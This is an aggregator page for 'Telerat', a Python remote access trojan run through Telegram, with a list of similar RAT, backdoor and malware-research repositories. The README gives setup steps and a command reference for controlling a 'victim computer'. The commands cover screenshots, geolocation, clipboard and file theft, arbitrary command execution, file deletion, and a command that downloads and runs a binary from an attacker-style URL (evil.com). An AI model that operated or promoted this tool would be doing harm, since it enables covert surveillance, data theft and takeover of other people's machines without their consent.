All Projects → 1d8 → Telerat

1d8 / Telerat

Telegram RAT written in Python

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to Telerat

Linux.mirai
Leaked Linux.Mirai Source Code for Research/IoC Development Purposes
Stars: ✭ 466 (+732.14%)
Mutual labels:  malware, malware-research
Thefatrat
Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV softw…
Stars: ✭ 5,944 (+10514.29%)
Mutual labels:  malware, rat
Malwaresourcecode
Collection of malware source code for a variety of platforms in an array of different programming languages.
Stars: ✭ 8,666 (+15375%)
Mutual labels:  malware, malware-research
Dex Oracle
A pattern based Dalvik deobfuscator which uses limited execution to improve semantic analysis
Stars: ✭ 398 (+610.71%)
Mutual labels:  malware, malware-research
Unencrypted Backdoor With Process Cloaking
Unencrypted backdoor
Stars: ✭ 16 (-71.43%)
Mutual labels:  malware, rat
Emp3r0r
linux post-exploitation framework made by linux user
Stars: ✭ 419 (+648.21%)
Mutual labels:  malware, rat
Malware Samples
A collection of malware samples and relevant dissection information, most probably referenced from http://blog.inquest.net
Stars: ✭ 565 (+908.93%)
Mutual labels:  malware, malware-research
Python Rootkit
Python Remote Administration Tool (RAT) to gain meterpreter session
Stars: ✭ 358 (+539.29%)
Mutual labels:  malware, rat
Yargen
yarGen is a generator for YARA rules
Stars: ✭ 795 (+1319.64%)
Mutual labels:  malware, malware-research
Lime Rat
LimeRAT | Simple, yet powerful remote administration tool for Windows (RAT)
Stars: ✭ 663 (+1083.93%)
Mutual labels:  malware, rat
Xeexe Topantivirusevasion
Undetectable & Xor encrypting with custom KEY (FUD Metasploit Rat) bypass Top Antivirus like BitDefender,Malwarebytes,Avast,ESET-NOD32,AVG,... & Automatically Add ICON and MANIFEST to excitable
Stars: ✭ 387 (+591.07%)
Mutual labels:  malware, rat
Njrat 0.7d Stub Csharp
njRAT C# Stub - Fixed For PowerShell
Stars: ✭ 28 (-50%)
Mutual labels:  malware, rat
Drakvuf Sandbox
DRAKVUF Sandbox - automated hypervisor-level malware analysis system
Stars: ✭ 384 (+585.71%)
Mutual labels:  malware, malware-research
Wdbgark
WinDBG Anti-RootKit Extension
Stars: ✭ 450 (+703.57%)
Mutual labels:  malware, malware-research
Simplify
Android virtual machine and deobfuscator
Stars: ✭ 3,865 (+6801.79%)
Mutual labels:  malware, malware-research
Multiscanner
Modular file scanning/analysis framework
Stars: ✭ 494 (+782.14%)
Mutual labels:  malware, malware-research
Coldfire
Golang malware development framework
Stars: ✭ 309 (+451.79%)
Mutual labels:  malware, malware-research
Ghost
👻 RAT (Remote Access Trojan) - Silent Botnet - Full Remote Command-Line Access - Download & Execute Programs - Spread Virus' & Malware
Stars: ✭ 312 (+457.14%)
Mutual labels:  malware, rat
Fame
FAME Automates Malware Evaluation
Stars: ✭ 663 (+1083.93%)
Mutual labels:  malware, malware-research
Thezoo
A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public.
Stars: ✭ 7,849 (+13916.07%)
Mutual labels:  malware, malware-research

teleRAT

Python based RAT that uses Telegram for sending commands and receiving data to and from a victim computer.

Setup.py

  1. Insert your API key into the api variable inside the setup.py script & run it. This will setup your Telegram chat with your created bot with the necessary commands to avoid inserting each command along with the help message.
  • Read here to create your own bot and obtain your API token.
  1. Install necessary requirements: pip install -r requirements.txt
  2. Send a command to your Telegram bot
  3. Run python3 main.py

Available Commands

  • /whoami - returns username. no additional arguments required.
  • /screenshot - takes screenshots. requires the number of screenshots to take (EX: /screenshot 5 <- to take 5 screenshots)
  • /location - returns location info (region, state, zip code, estimated coordinates, timezone, country, ip address)
  • /metadata - returns metadata info about a specified file. requires filepath as an additional argument (EX: /metadata C:\Users\Username\Files\special.java <- will return metadata info about special.java)
  • /execute - executes specified system command. requires 2 additional arguments: the system command and additional arguments to pass to that system command (EX: /execute cmd.exe [/c,ver] or /execute binary.exe none} in order to execute binary.exe with no arguments)
  • /power - allows operator to shutoff, hibernate, or restart computer. requires 1 additional argument: hibernate, pd (to power down), or restart (EX: /power pd <- to power down the victim's computer)
  • /ls - provides operator with directory listing. If no additional argument is provided, it provides directory listing for directory in which malware is. Additional argument of a directory is optional (EX: /ls %APPDATA% <- provides directory listing for APPDATA directory)
  • /delete - deletes a user specified file. Additional argument of filepath is required (EX: /delete C:\Users\Username\Files\temp.txt <- deletes a file named temp.txt)
  • /wreport - provides information regarding the wireless profiles the computer has connected to in the past, the drivers, and a list of wireless interfaces.
  • /remotebinary - download and execute a remote binary. Requires 2 additional arguments: the URL where the binary is and any additional arguments to pass when executing the binary (EX: /remotebinary https://evil.com/file.exe noargs <- execute file.exe with no arguments or /remotebinary https://evil.com/file.exe [-c,-f] <- to execute file.exe with flags c & f)
  • /processes - returns a list of running processes and services
  • /gather - return a specified file. requires 1 additional argument: the filepath (EX: /gather C:\Users\username\important\file.xlsx <- grab and upload file.xlsx to Telegram chat)
  • /report - provides a hardware report & Windows version to operator
  • /playnoise - plays a user specified noise. available list of noises include: asterisk sound (asterisk), exclamation sound (exclamation), exit sound (exit), hand sound (hand), question sound (question), and beep (beep) (EX: /playnoise beep or /playnoise question)
  • /gatherclip - returns data currently copied in the victim's clipboard. requires no additional arguments.
  • /messagebox - will present the victim with a message box. 2 additional arguments are required: caption and title for the window (EX: /messagebox <title>
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].